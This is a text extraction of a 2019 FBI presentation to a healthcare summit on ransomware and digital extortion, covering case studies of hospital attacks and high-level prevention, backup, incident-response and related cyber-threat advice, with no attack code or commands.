Ransomware and Digital Extortion Prevention and Recovery Presented - - PDF document

8/12/2019 1

Ransomware and Digital Extortion

Prevention and Recovery

Presented By: CS-FO Thomas Gilchrist, FBI-Oklahoma City On Behalf Of: Explore Healthcare Summit 2019

My Bio

• 2007: Intern at FBI-Birmingham
• 2008: SSC/SST/OST at FBI-Birmingham
• 2009: B.S. in Criminal Justice at UAB
• 2013: M.S. in CIS at UAB
• 2015: CS-FO at FBI-OKC
• 2018: Adjunct Faculty at UCO

Today’s Objectives

• Overview of Ransomware/Digital Extortion and

the Threat to Healthcare Industry

• Case Studies of Healthcare Ransomware Attacks
• Ransomware Tips/Strategies for Prevention,

Mitigation Preparation and Recovery

• Law Enforcement Involvement Considerations
• Overview of Other Cyber Attacks

– Denial-of-Service, Data Theft, Business Email Compromise, Malvertising, Cryptojacking

• Q and A

8/12/2019 2

Ransomware and Digital Extortion

• Digital Extortion is the act of coercing an individual or

company to pay to access stolen or hidden cyber assets

– Ransomware is the most common weapon for achieving this – 2016 was the “Year of Ransomware”

Two Types of Ransomware

• #1: Locker

– “Locks down” a digital device – Blocks the user’s ability to access anything on the system until the ransom is paid – Files remain intact (just not accessible) – Common requested payment is prepaid cards and vouchers – Most commonly targets mobile devices

• #2: Crypto

– Weaponizes encryption – Searches through files on a system targeting specific file extensions – Encrypts targeted files and drops a ransom note for payment in exchange for the private key (required for decryption) – Common payment is cryptocurrency (Bitcoin)

Locker Ransomware

8/12/2019 3

Crypto Ransomware

Ransom Note Encrypted Files Targeted File Extensions

Ransom Notes

Text File HTML Splash Page

Healthcare is Under Attack

• Some 2019 Statistics:

– 89% of healthcare organizations have experienced a data breach in the past 2 years – 50% of healthcare organizations have experienced a ransomware incident within 1 year – Average losses for ransomware on a business is $133,000 – Estimated losses for healthcare industry in 2019 is $25 billion

• Reasons Healthcare Targeted:

– Significant amount of PII in data – Downtime of systems means downtime in patient care – Its profitable!

8/12/2019 4 Case Study #1: Hollywood Presbyterian

• 2016 –

First well-documented attack on healthcare

• Hollywood Presbyterian

Medical Center

– Los Angeles, CA

• Targeted by Locky ransomware

– Delivered through VBA Macro embedded Word Doc

• 10 Days of Downtime

– Systems for lab work, pharmaceutical orders, and emergency room inaccessible

• Paid $17,000 Bitcoin ransom

Case Study #2: MedStar Health

• 2016 – First multi-site attack
• Affected 10 hospitals and

more than 250 outpatient centers

– Baltimore/DC Area

• Targeted by SamSam ransomware

– Delivered via Web App security vulnerability (a patch existed)

• Mass confusion caused by multi-site compromise
• Paid $19,000 Bitcoin ransom
• Two Iranian hackers indicted in 2018 by DOJ

– Made roughly $6 million and caused $30 million in damages

Case Study #3: To Pay or Not to Pay

• 2016 –

Kansas Heart Hospital

– Wichita, KS

• Paid initial ransom

– Partial file access – Second ransom demand

• 2016 –

Christopher Rural Health

– Christopher, IL

• Did not pay ransom

– Restored from backups!

• The FBI DOES NOT support ransom payment

– Cyber Division Assistant Director James Trainor

• Reasons:

– Access to files is not a guarantee (see Kansas Heart) – Payment can fund other criminal enterprises – Payment sets bad precedent and emboldens criminals

8/12/2019 5

2019 Attacks Continue…

• While ransomware attacks are on the decline for most industries

this is not the case for healthcare

– Due to the success rate of these organizations paying ransoms quickly to regain access to important data and a lack of preparedness

• NEO Urology

– Paid $75,000 ransom – Suffered 3 days of downtime

• Estes Park Health

– Insurance paid the ransom…TWICE – Paid $10,000 deductible on ransom payment

• Olean Medical Group
• Seneca Nation Health System
• Shingle Springs Health and Wellness Center
• Boston Residex Software

Ransomware Prevention

• Prevention of ransomware is associated with understanding

common delivery mechanisms and “plugging those holes”

– Prevent the malware from getting on your systems in the first place!

• Common Initial Attack Vectors

– Phishing/Email Attachments – Social Engineering – Vulnerability Exploit Kits – Hacking

• Let’s discuss some techniques to prevent each of these…

Phishing/Social Engineering

• Continual education of employees against phishing attacks

and social engineering is critical

• Train employees to never open email attachments with

certain suspicious file extensions: exe, vbs, js, ps

• Turn off JavaScript execution in Adobe Reader for PDFs
• Turn off Flash player execution in Browsers
• Be VERY cautious of

Microsoft Office VBA Macros

– Often code that reaches

• ut to malicious server

to download and execute malware

8/12/2019 6

More Email Tips

• Train employees to be cautious with links

– Shortened links are suspicious; sites exist to expand out shortened links without visiting them (checkshorturl.com) – Be aware a link can say it will send you one place and redirect you to a malicious site to download malware – Be aware legitimate sites can host ads that direct to malware

• See Malvertising later…
• Train employees to be cautious with unknown storage media

– USBs exist that pose as a “virtual keyboard” entering commands into a system when plugged in; they execute commands on the system with no user interaction!

Hacking

• Hacking just means gaining

unauthorized access to network

– Its not always that sophisticated!

• If the criminal can gain access to the network, they no longer

need an employee to execute the malware…they can just do it themselves

Hacking/Vulnerabilities Tips

• There are many ways to prevent unauthorized access

– Block remote access unless absolutely necessary – Severely limit users that can remote access – Whitelist specific devices allowed remote access – Enforce strong passwords and Two Factor Authentication – Enable logging of proxies and VPN concentrators – Keep systems patched for security risks – Run automatic vulnerability scans for security risks

• Nessus

– Hire pen testers to test the network and your security team

• White Hat Hackers
• Be wary of vulnerability scanners posing as pen testers!

8/12/2019 7

Ransomware Preparedness

• Preparedness for ransomware is the process of putting

protections in place to mitigate the damage of a ransomware attack BEFORE it occurs

• #1 Key is BACKUPS!

– BACKUP all operations critical data – Backups should be AIR-GAPPED

• Store OFFLINE and OFFSITE
• Anti-Ransomware Software

– Antivirus vendors are offering Anti-ransomware software – Detects sudden mass changes to files and stops it from continuing – Companies like Malwarebytes are still Beta testing

Ransomware Preparedness Cont.

• Engineer Network Architecture with Security Precautions

– Utilize host and network security appliances like firewalls and intrusion detection/prevention systems

• Configure with default deny rules and event alerts instead of silent logs

– Segment network with VLANs to prevent lateral movement – Use Virtual Machine environments

• Snapshot to have restore points

– Use Honeypots and Decoy Systems – Utilize a constant Network Security Monitoring team

• Requires human inspection not just IDS/IPS auto alerting

Incident Response and Recovery

• Fully Develop Incident Response Plan

– Fully scope your security landscape

• Includes all sites and third parties with access like contractors/vendors

– Fully identify job duties and roles

• Typical plan:

– Isolate infected systems from network – Identify the malware by researching encrypted file extensions

• Some ransomware strands have known decryptors online!

– Collect Evidence for/report to law enforcement

• Image compromised systems, memory captures of live compromised systems,

security log files, malicious executables, phishing emails with headers

– Restore systems via backups – Fix security flaw to prevent similar compromise

8/12/2019 8

Law Enforcement Considerations

• Things the FBI will not do:

– Help restore your data – Determine who you should notify

• Things the FBI will do:

– Collect evidence for investigation – Indict the parties involved

Denial-of-Service

• A denial-of-service (DoS) attack

has one goal: Make a networked service or resource unavailable

• DoS is the older cousin of

ransomware

• There are two main methods:

– Distributed DoS (DDoS) flood bandwidth with junk traffic – Exploit bug/weakness in application to cause it to freeze/crash

DoS Prevention and Recovery

• There are several vendors of DDoS protection services

– Such as Imperva Incapsula, Akamai, and Cloudflare

• There are things your organization can do to mitigate attacks

– Engineer the architecture to have real-time scalable bandwidth and design failsafes for system crashes – Use black hole routing to route malicious traffic to another destination to be dropped – Keep services and applications patched for known flaws – Configure firewalls and IDS/IPS to use rate limiting and traffic filtering – Use load balancing for important services – Use a CAPTCHA to prevent bot access to a resource

8/12/2019 9

Data Theft

• When a network is compromised, data theft is a real

possibility

– Target Personally Identifying Information (PII) or trade secrets

• Possible for data theft to occur prior to a ransomware attack

Data Theft Protections

• The key to protecting data is to identify data to be protected!

– Knowledge is power…must KNOW what is sensitive in your network

• Design your network in mind to protect sensitive data

– Segment it away from publicly accessible network segments behind security appliances – Restrict access with strong authentication – Store with encryption – Monitor access with logs and/or traffic captures/live monitoring

• Most important means of protection is education of social

engineering attacks!

Business Email Compromise

• BEC refers to a group of attacks designed to trick businesses

and/or their customers/vendors into redirecting payments to a criminal third party

– Sometimes compromise legitimate business email accounts – Sometimes spoof (pretend to be) legitimate business email accounts – Sometimes use misspellings of business email accounts

• Healthcare email fraud

attacks have increased 473% in the past 2 years

8/12/2019 10

BEC Prevention

• Educate employees that make financial transfers

– Implement a Two-Step Verification protocol in which all financial funds transfers and modifications are approved by a second party preferably via phone

• Protect your email accounts from unauthorized access

– Avoid using free email account services like Gmail or Yahoo – Implement a Two-Factor Authentication solution – Monitor email forwarding rules

• Protect from spoofed email

– Utilize DMARC/DKIM to protect your domain from being spoofed – Utilize email spam filters

• Protect from “similar sounding” domains

– Consider buying rights to common domain misspellings

Malvertising/Cryptojacking

• Malvertising is a technique of using ad banners and pop ups

to download and execute malware onto a victim system

– Some require user to click ad and others are “drive by downloads” – Another delivery mechanism for ransomware too! – Best security is Pop Up/Ad Blockers with AV or Browser settings

• Cryptojacking is a means of forcing a user’s system to mine

cryptocurrency when visiting a web site

– A legitimate web server is compromised to host JavaScript file that embeds in a footer on the site’s pages; executed when viewed – The new malware threat of 2018-2019 – Best security is minimizing user accounts that can edit site content and using good authentication of those accounts – Also look for suspicious JavaScript files and references to “Coinhive”

Contact Info and Q&A

CS-FO Thomas Gilchrist

tgilchrist@fbi.gov or thomas.gilchrist@ic.fbi.gov 405-290-3745

Main Office OKC-FBI

Ask to speak to the Duty Agent or an available Cyber Agent 405-290-7770

IC3.gov